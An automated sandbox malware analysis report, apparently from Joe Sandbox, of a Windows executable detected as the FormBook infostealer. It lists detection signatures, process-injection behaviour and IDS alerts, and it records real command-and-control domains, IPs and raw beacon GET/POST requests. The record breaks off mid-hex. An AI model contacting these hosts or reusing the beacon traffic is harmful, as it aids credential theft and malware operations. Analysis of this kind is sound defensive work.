Edit tour

Windows Analysis Report
eoIIBcxUj3.exe

Overview

General Information

Sample name:eoIIBcxUj3.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:c2c8b9851e807452f57cd7a1fabec3ba
Analysis ID:1653437
MD5:c2c8b9851e807452f57cd7a1fabec3ba
SHA1:d38ad61023caa4d2c2b10e3474ed5658d797cc58
SHA256:64826dad12787e9f9989046e0b0d1f58704e52968dbb12de2fcc948dbf2bf2d0
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • eoIIBcxUj3.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\eoIIBcxUj3.exe" MD5: C2C8B9851E807452F57CD7A1FABEC3BA)
    • svchost.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\eoIIBcxUj3.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UJarIfYl5U.exe (PID: 6356 cmdline: "C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\Que6zKtSrCf5.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • sfc.exe (PID: 3888 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • UJarIfYl5U.exe (PID: 6292 cmdline: "C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UHcFP3RaOlKm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7616 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ParentImage: C:\Users\user\Desktop\eoIIBcxUj3.exe, ParentProcessId: 7804, ParentProcessName: eoIIBcxUj3.exe, ProcessCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ProcessId: 7856, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ParentImage: C:\Users\user\Desktop\eoIIBcxUj3.exe, ParentProcessId: 7804, ParentProcessName: eoIIBcxUj3.exe, ProcessCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ProcessId: 7856, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-01T09:04:00.390735+020028563181A Network Trojan was detected192.168.2.44972413.248.213.4580TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: eoIIBcxUj3.exeAvira: detected
            Source: http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68JpkAvira URL Cloud: Label: malware
            Source: http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68JpkAvira URL Cloud: Label: malware
            Source: http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68JpkAvira URL Cloud: Label: malware
            Source: http://www.sigaque.today/n61y/Avira URL Cloud: Label: malware
            Source: http://www.l33900.xyzAvira URL Cloud: Label: malware
            Source: http://www.l33900.xyz/gwiz/Avira URL Cloud: Label: malware
            Source: http://www.qzsazi.info/iwsk/Avira URL Cloud: Label: malware
            Source: http://www.cruycq.info/0vwm/Avira URL Cloud: Label: malware
            Source: http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68JpkAvira URL Cloud: Label: malware
            Source: eoIIBcxUj3.exeVirustotal: Detection: 75%Perma Link
            Source: eoIIBcxUj3.exeReversingLabs: Detection: 78%
            Source: Yara matchFile source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: eoIIBcxUj3.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: wntdll.pdbUGP source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJarIfYl5U.exe, 00000009.00000002.3668098223.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3667414090.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49724 -> 13.248.213.45:80
            Source: DNS query: www.031233226.xyz
            Source: DNS query: www.031233226.xyz
            Source: DNS query: www.l33900.xyz
            Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
            Source: Joe Sandbox ViewIP Address: 13.248.213.45 13.248.213.45
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.031233226.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.woodsplace.netUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n61y/?u8S0Yd=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.sigaque.todayUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.cruycq.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.l33900.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.031233226.xyz
            Source: global trafficDNS traffic detected: DNS query: www.vipstargold.buzz
            Source: global trafficDNS traffic detected: DNS query: www.woodsplace.net
            Source: global trafficDNS traffic detected: DNS query: www.sigaque.today
            Source: global trafficDNS traffic detected: DNS query: www.kitculture.shop
            Source: global trafficDNS traffic detected: DNS query: www.f66el619d.shop
            Source: global trafficDNS traffic detected: DNS query: www.alplace.site
            Source: global trafficDNS traffic detected: DNS query: www.cruycq.info
            Source: global trafficDNS traffic detected: DNS query: www.elevatetextiles.net
            Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
            Source: global trafficDNS traffic detected: DNS query: www.l33900.xyz
            Source: global trafficDNS traffic detected: DNS query: www.milp.store
            Source: unknownHTTP traffic detected: POST /cu04/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.woodsplace.netOrigin: http://www.woodsplace.netReferer: http://www.woodsplace.net/cu04/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 53 34 42 56 41 69 4a 75 34 43 71 59 46 6e 53 48 78 32 73 31 78 6a 47 69 4d 78 31 74 31 79 69 35 46 41 3d 3d Data Ascii: u8S0Yd=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:03:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1giYocPV4iM8un99%2BjzPQNTksSicE47h7r6M%2Bbma8nXqEYvqPTc6zEF%2FJHLabd8TS8fJkwYUTproC48GzrN%2FbVJhrp334Lm1Evb%2BtkEcRNBhEl%2BbNbwTjKhWgz2wMMqdn0dwTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b2d4a8842da-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=93653&min_rtt=93653&rtt_var=46826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7ydtDJLN%2F8Tl4hlK3hVElUrHhf4x5JZ24Az1D%2F0frQHs3Htd6sazyOOA2QaUvO%2FX0Yn46HtzRWKutXBZuV8688doX4SGTppP0DFMXIoIq%2FyQ%2FaCN8HHwWSebU77P7GSw9CTqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b3dcb48438e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99818&min_rtt=99818&rtt_var=49909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cggA0wmiT0jKnh6xIWBkdquHQN95AU13jnShtu5EqCnP4LpDy6FrTZNa6Kz%2FBywhAsuRztA89LlRQ1w%2BVe8S73S9p9FJubGSjopAfGdnsbNbK%2FYF%2FVAJC6Twhvq32RS7JA3WQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b4e4df88c47-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=98150&min_rtt=98150&rtt_var=49075&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKnbKusfi5Uq1hNmMg%2BzEHhJaNjSL4c6KRIa6PV8rs3vnSSBJZ3EDxr4Y4OyG42xVFgtSPxtM9aj0K%2FkSpOQ3BfFYbrM%2FH%2B2bQqK3O%2FQmozbXWz0sUZiRCChMJNXoCe7IW3TSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b5f0bb81819-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97244&min_rtt=97244&rtt_var=48622&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 